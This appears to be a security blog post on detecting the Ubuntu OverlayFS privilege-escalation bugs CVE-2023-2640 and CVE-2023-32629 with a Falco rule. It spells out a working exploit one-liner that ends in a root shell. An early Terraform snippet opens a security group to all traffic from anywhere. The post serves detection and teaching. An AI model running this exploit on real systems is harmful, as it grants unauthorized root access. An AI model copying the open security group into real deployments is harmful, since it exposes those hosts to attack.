Detecting Container Jailbreaks Using Falco

Building Security and Monitoring into Containerized Workloads

Running containerized workloads with non-root privileges enforces the principle of least privilege: a workload receives only the permissions it needs to perform its task, which limits lateral movement and reduces the attack surface. It also helps protect the host system from misconfiguration and even container escape.

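# Declared here because the subnet's availability_zone below references var.aws_region.
variable "aws_region" {
  type    = string
  default = "ap-southeast-3"
}

provider "aws" {
  region = var.aws_region
}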

resource "aws_vpc" "main" {
  cidr_block = "10.0.0.0/16"
}

resource "aws_subnet" "main" {
  vpc_id                  = aws_vpc.main.id
  cidr_block              = "10.0.1.0/24"
  availability_zone       = "${var.aws_region}a"  # Set the correct AZ
}

resource "aws_ecs_cluster" "cluster" {
  name = "example-cluster"
}

resource "aws_ecs_task_definition" "task" {
  family                   = "example-task"
  network_mode             = "awsvpc"
  requires_compatibilities = ["EC2"]
  cpu                      = "256"
  memory                   = "512"

  container_definitions = jsonencode([
    {
      name  = "bad",
      image = "manojahuje/ubuntu:jammy",
      cpu   = 256,
      memory = 512,
      essential = true,
      command = ["sleep", "3600"],
    }
  ])
}

resource "aws_ecs_service" "service" {
  name            = "example-service"
  cluster         = aws_ecs_cluster.cluster.id
  task_definition = aws_ecs_task_definition.task.arn
  launch_type     = "EC2"

  network_configuration {
    assign_public_ip = false  # public IPs on task ENIs are supported only for the Fargate launch type
    subnets          = [aws_subnet.main.id]
    security_groups  = [aws_security_group.sg.id]
  }

  desired_count = 1
}

resource "aws_security_group" "sg" {
  vpc_id = aws_vpc.main.id

  ingress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }

  egress {
    from_port   = 0
    to_port     = 0
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

Recently, however, researchers at Wiz disclosed two privilege escalation vulnerabilities in the Ubuntu kernel, CVE-2023-2640 and CVE-2023-32629. Both are closely related to an older vulnerability, CVE-2023-0386, in which a flaw in OverlayFS allowed SUID files to be copied from a nosuid mount into another directory, enabling privilege escalation to root.

OverlayFS is a critical technology in the modern computing environment, especially in container orchestration systems like Kubernetes. Its functionality facilitates the layered filesystems that containers use, which is essential for the efficient, modular, and fast deployment that these systems are known for.

As a union mount filesystem, OverlayFS relies on the interplay between a lower (read-only) layer and an upper (read-write) layer. This layering gives OverlayFS its flexibility and utility, but it can also be a vector for vulnerabilities.

Files move from the lower layer to the upper layer through a process known as copy-up: when a file in the lower layer is modified, it is first copied to the upper layer, and the change is applied to that copy. The following steps demonstrate it (mounting requires root privileges).

# Step 1: Set up the directories that will be used as the lower, upper, work, and merged directories.
mkdir -p /overlay/{lower,upper,work,merged}

# Step 2: Copy the Python binary (or any other file) to the lower directory.
cp /usr/bin/python3 /overlay/lower/

# Step 3: Mount the overlay filesystem with the specified lower, upper, work, and merged directories.
mount -t overlay overlay -o lowerdir=/overlay/lower,upperdir=/overlay/upper,workdir=/overlay/work /overlay/merged

# Step 4: Verify that the Python binary is accessible in the merged directory.
ls /overlay/merged/python3

# Step 5: Use the touch command on the Python binary in the merged directory to initiate a copy-up operation.
touch /overlay/merged/python3

# Step 6: Verify that the Python binary has been copied to the upper directory.
ls /overlay/upper/python3
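The lookup and copy-up behaviour shown in the steps above can also be sketched as a toy model. This is only an illustration of the idea, not how the kernel implements OverlayFS; the ToyOverlay class and its method names are made up for this example.

```python
class ToyOverlay:
    """Toy model of an overlay mount: a read-only lower layer plus a writable upper layer."""

    def __init__(self, lower):
        self.lower = dict(lower)  # read-only layer: file name -> contents
        self.upper = {}           # writable layer, empty right after mounting

    def read(self, name):
        # The merged view prefers the upper layer and falls back to the lower one.
        if name in self.upper:
            return self.upper[name]
        return self.lower[name]

    def modify(self, name, new_contents=None):
        # Any modification, even a metadata-only one such as `touch`,
        # first copies the file up; the change then lands on the upper copy.
        if name not in self.upper:
            self.upper[name] = self.lower[name]
        if new_contents is not None:
            self.upper[name] = new_contents


overlay = ToyOverlay({"python3": b"binary contents"})
overlay.modify("python3")  # comparable to `touch /overlay/merged/python3`
print("python3" in overlay.upper)
```

After the call to modify, the file exists in both layers, and the lower layer is never written to. The real copy-up also carries over metadata such as extended attributes, which is what the vulnerabilities discussed next depend on.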

CVE-2023-2640 and CVE-2023-32629 abuse weaknesses in how the Ubuntu kernel copies extended attributes during copy-up. In the ovl_copy_xattr function, extended attributes, including file capabilities as sensitive as CAP_SYS_ADMIN or CAP_SETUID, are transferred from files in the lower directory to the upper directory. The code does nothing to limit or sanitize the capabilities being transferred, potentially allowing unprivileged users to perform privileged operations.

Inside ovl_copy_xattr, each attribute is written by the ovl_do_setxattr call shown below. That call in turn reaches the wrapper function __vfs_setxattr_noperm, which does not restrict file security capabilities to a namespace, opening a pathway for privilege escalation.

error = ovl_do_setxattr(OVL_FS(sb), new, name, value, size, 0);

The function also handles errors and bad states insufficiently. While it covers several error cases, as in the excerpt below, extended attributes that are not correctly handled or sanitized can still slip past the security checks.

if (error < 0 && error != -EOPNOTSUPP)
    break;
if (error == 1) {
    error = 0;
    continue; /* Discard */
}

To exploit the vulnerability, we can use the following command, which looks long-winded but is actually very simple.

unshare -rm sh -c "mkdir 1 u w m && cp /usr/bin/python3 1/; \
setcap cap_setuid+eip 1/python3; \
mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w m && touch m/*;" \
&& u/python3 -c 'import pty;import os;os.setuid(0); pty.spawn("/bin/bash")'

To break down the command, we first need to understand the exploit chain. It starts with unshare -rm, which creates a new user namespace and a new mount namespace: -r maps the current user to root inside the namespace, and -m gives the namespace its own mount points, separate from the main system’s environment. This is the foundation of the exploit, because it lets an unprivileged user run the setcap and mount steps that follow.

unshare -rm
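To see what "root" means inside such a namespace, we can look at the namespace's UID mapping, which the kernel exposes in /proc/<pid>/uid_map as lines of three numbers: the first UID inside the namespace, the first UID outside it, and the length of the range. The sketch below parses that format; the helper names and the sample line (a user with UID 1000 who ran unshare -r) are assumptions for illustration.

```python
def parse_uid_map(text):
    """Parse uid_map content into (inside_start, outside_start, length) tuples."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            inside, outside, length = (int(field) for field in fields)
            entries.append((inside, outside, length))
    return entries


def outside_uid(entries, inside_uid):
    """Translate a UID seen inside the namespace to the UID the host sees (None if unmapped)."""
    for inside, outside, length in entries:
        if inside <= inside_uid < inside + length:
            return outside + (inside_uid - inside)
    return None


# Hypothetical mapping for UID 1000 after `unshare -r`.
sample = "         0       1000          1\n"
entries = parse_uid_map(sample)
print(outside_uid(entries, 0))
```

In this sample, UID 0 inside the namespace is still UID 1000 as far as the host is concerned, so anything created there should carry no privilege outside the namespace. The exploit works because file capabilities escape that boundary.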

Next, four directories (1, u, w, m) are created to stage the overlay filesystem, and the Python3 binary is copied from its standard location into the directory named ‘1’.

mkdir 1 u w m && cp /usr/bin/python3 1/;

The setcap command then grants the CAP_SETUID capability to the copied Python3 binary. The +eip suffix adds the capability to the file's effective, inheritable, and permitted sets. This is the crucial step: a process running this binary may change its user ID to any value, including 0, which lays the ground for the privilege escalation that is the goal of this exploit.

setcap cap_setuid+eip 1/python3;
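File capabilities set this way are stored in the security.capability extended attribute. The sketch below decodes that attribute, assuming the revision 2 and revision 3 layouts from the kernel's capability headers as we understand them: a little-endian magic word with an "effective" flag, two pairs of permitted and inheritable 32-bit words, and, in revision 3 only, a trailing root ID that ties the capability to a user namespace. The function name and the sample blob are made up for this example.

```python
import struct

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000    # plain file capabilities (20 bytes)
VFS_CAP_REVISION_3 = 0x03000000    # namespaced file capabilities (24 bytes)
VFS_CAP_FLAGS_EFFECTIVE = 0x000001
CAP_SETUID = 7                     # bit number of CAP_SETUID


def decode_file_caps(blob):
    """Decode a raw security.capability value into its capability sets."""
    (magic_etc,) = struct.unpack_from("<I", blob, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision == VFS_CAP_REVISION_2 and len(blob) == 20:
        rootid = None  # not tied to any user namespace
    elif revision == VFS_CAP_REVISION_3 and len(blob) == 24:
        (rootid,) = struct.unpack_from("<I", blob, 20)
    else:
        raise ValueError("unsupported security.capability layout")
    perm_lo, inh_lo, perm_hi, inh_hi = struct.unpack_from("<4I", blob, 4)
    return {
        "permitted": perm_lo | (perm_hi << 32),
        "inheritable": inh_lo | (inh_hi << 32),
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "rootid": rootid,
    }


# Hand-built sample: what a revision 2 value for cap_setuid+eip would look like.
sample = struct.pack(
    "<5I",
    VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE,
    1 << CAP_SETUID, 1 << CAP_SETUID, 0, 0,
)
caps = decode_file_caps(sample)
print(bool(caps["permitted"] >> CAP_SETUID & 1), caps["rootid"])
```

On a Linux host, the raw value can be read with os.getxattr(path, "security.capability"). A value with no root ID is honored regardless of user namespace, which is why the missing namespace restriction during copy-up matters so much.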

The mount command then constructs the overlay filesystem, with the directory ‘1’ as the lower layer, u as the upper layer, w as the work directory, and m as the merged mount point. The lower layer holds the Python3 binary with its added capability, setting the stage for the copy-up operation that follows.

mount -t overlay overlay -o rw,lowerdir=1,upperdir=u,workdir=w m

Next, touch m/* triggers a copy-up operation for every file in the merged directory, which copies the Python3 binary, capabilities included, from the lower layer to the upper, writable layer. This step is pivotal: the copy in u is reachable from outside the namespace, and because the capability was not restricted to the namespace during copy-up, it remains effective for the non-root user running the command.

touch m/*;

In the final link of the chain, the binary that was copied to the upper layer runs a short Python script outside the namespace. It first calls os.setuid(0) to change the user ID of the current process to zero, acquiring root privileges; the CAP_SETUID capability on the binary is what allows this. It then calls pty.spawn("/bin/bash") to start a Bash shell with root privileges, which essentially hands over full control of the system to the user.

u/python3 -c 'import pty;import os;os.setuid(0); pty.spawn("/bin/bash")'

And this method works. The exploit was run on an AWS ECS instance accessed through ECS Exec (part of AWS SSM, but for containerized workloads).

AWS ECS provides several advantages from an attacker's perspective:

  • It is not covered by AWS's runtime security platform, Amazon GuardDuty, which currently supports runtime threat detection for containerized workloads only in Elastic Kubernetes Service (EKS).

  • While EDRs like CrowdStrike can detect and mitigate threats inside containers, a lot of vendors avoid putting EDRs inside containers because of their performance impact.

  • AWS CloudTrail logs can provide insight into unusual API calls or access patterns, but without automated detection, SOC teams are often inundated with useless logs from CloudWatch.

This is where Falco comes in. Falco is an open-source Cloud Native Computing Foundation (CNCF) project that uses eBPF (extended Berkeley Packet Filter) to detect anomalous activity in your containerized applications. Because eBPF operates at the kernel level, Falco can monitor system and network activity efficiently, without significantly affecting system performance.

Falco rules are defined in rule files, which are written in YAML. The following rule flags the setcap step of the exploit.

- rule: Suspicious setcap Usage
  desc: >
    Detects when the setcap command is used to set the cap_setuid capability, which could potentially be used in privilege escalation attacks.
  condition: >
    spawned_process and proc.name = "setcap" and (proc.args contains "cap_setuid+eip")
  output: >
    Suspicious setcap usage detected (user=%user.name command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
  priority: CRITICAL
  tags: [process, mitre_privilege_escalation]

Explanation:

  • spawned_process: This macro is used to detect when a new process has been spawned.

  • proc.name = "setcap": This condition matches when the process name is "setcap".

  • proc.args contains "cap_setuid+eip": This condition matches when the arguments to the process contain the string "cap_setuid+eip", which is the critical part of the exploit that sets the necessary capabilities on the python3 binary.

  • output: This defines the output format of the alert message, which includes useful information such as the username of the user who ran the command, the full command line, and container information (if applicable).
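To make the matching logic concrete, the condition above can be mimicked in a few lines of Python. This is only a rough approximation for reasoning about the rule, not Falco's engine: we assume spawned_process boils down to a completed execve or execveat event, and the event dictionaries are hand-written stand-ins for real Falco events.

```python
def matches_suspicious_setcap(event):
    """Approximate the rule condition against a dict of Falco-style fields."""
    # Assumed expansion of the spawned_process macro: an exec call on its exit side.
    spawned_process = (
        event.get("evt.type") in ("execve", "execveat")
        and event.get("evt.dir") == "<"
    )
    return (
        spawned_process
        and event.get("proc.name") == "setcap"
        # `contains` is treated here as a plain substring match.
        and "cap_setuid+eip" in event.get("proc.args", "")
    )


exploit_event = {
    "evt.type": "execve",
    "evt.dir": "<",
    "proc.name": "setcap",
    "proc.args": "cap_setuid+eip 1/python3",
}
variant_event = dict(exploit_event, **{"proc.args": "cap_setuid+ep 1/python3"})

print(matches_suspicious_setcap(exploit_event))
print(matches_suspicious_setcap(variant_event))
```

The second event is worth a look: an attacker who writes the capability string slightly differently, for example cap_setuid+ep, would not match the literal substring. Matching on "cap_setuid" alone is one way to broaden the rule, at the cost of more false positives.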

Falco also has plugins for CloudTrail and Fargate. The Falco engine compares activity on the monitored container hosts and Kubernetes nodes against the Falco ruleset and generates an alert when a match is found. As most major SIEM/SOAR platforms charge for log ingestion per gigabyte, sending only alerts rather than the full log collection is more effective and affordable.

When a Falco rule triggers, the alert and all its metadata are forwarded via Falcosidekick to a central remote Syslog server. Falcosidekick supports both JSON and CEF (Common Event Format) for Syslog output. Because CEF is widely supported, we don't need another platform to convert the log format before forwarding the log data to a SIEM.

Falco alert data is forwarded via remote Syslog to any SIEM you prefer, such as Splunk (Splunk Search Processing Language (SPL)), DEVO (Link Integrated Query), and Microsoft Sentinel (Kusto Query Language).
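As a rough illustration of what such a conversion involves, the sketch below turns a Falco JSON alert into a single CEF line. It is not Falcosidekick's actual mapping: the priority-to-severity table, the placeholder device version "0", and the choice of the msg and suser extension keys are all assumptions made for this example.

```python
import json

# Assumed mapping from Falco priorities to CEF severities (0-10).
PRIORITY_TO_SEVERITY = {
    "Emergency": 10, "Alert": 9, "Critical": 8, "Error": 7,
    "Warning": 5, "Notice": 3, "Informational": 2, "Debug": 1,
}


def _escape_header(value):
    # CEF header fields escape backslashes and pipes.
    return str(value).replace("\\", "\\\\").replace("|", "\\|")


def _escape_extension(value):
    # CEF extension values escape backslashes, equals signs and newlines.
    return str(value).replace("\\", "\\\\").replace("=", "\\=").replace("\n", "\\n")


def falco_alert_to_cef(alert_json):
    """Build one CEF line from a Falco JSON alert (illustrative mapping only)."""
    alert = json.loads(alert_json)
    rule = alert.get("rule", "unknown")
    priority = str(alert.get("priority", "")).capitalize()
    severity = PRIORITY_TO_SEVERITY.get(priority, 5)
    # Header: version, vendor, product, device version, event class ID, name, severity.
    header = ["CEF:0", "Falco", "Falco", "0", rule, rule, severity]
    extension = {"msg": alert.get("output", "")}
    user = (alert.get("output_fields") or {}).get("user.name")
    if user is not None:
        extension["suser"] = user
    ext_text = " ".join(f"{k}={_escape_extension(v)}" for k, v in extension.items())
    return "|".join(_escape_header(h) for h in header) + "|" + ext_text


sample_alert = json.dumps({
    "rule": "Suspicious setcap Usage",
    "priority": "Critical",
    "output": "Suspicious setcap usage detected (user=root command=setcap cap_setuid+eip 1/python3)",
    "output_fields": {"user.name": "root"},
})
print(falco_alert_to_cef(sample_alert))
```

The escaping is the part that is easy to get wrong: Falco output strings are full of key=value pairs, and an unescaped equals sign would be read by a CEF parser as the start of a new extension field.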

You can create custom alerts in your SIEM to reduce alert fatigue, and perform threat hunting using the query language of your preferred SIEM. In addition, mature rulesets reduce false positives and further save on SIEM ingestion costs.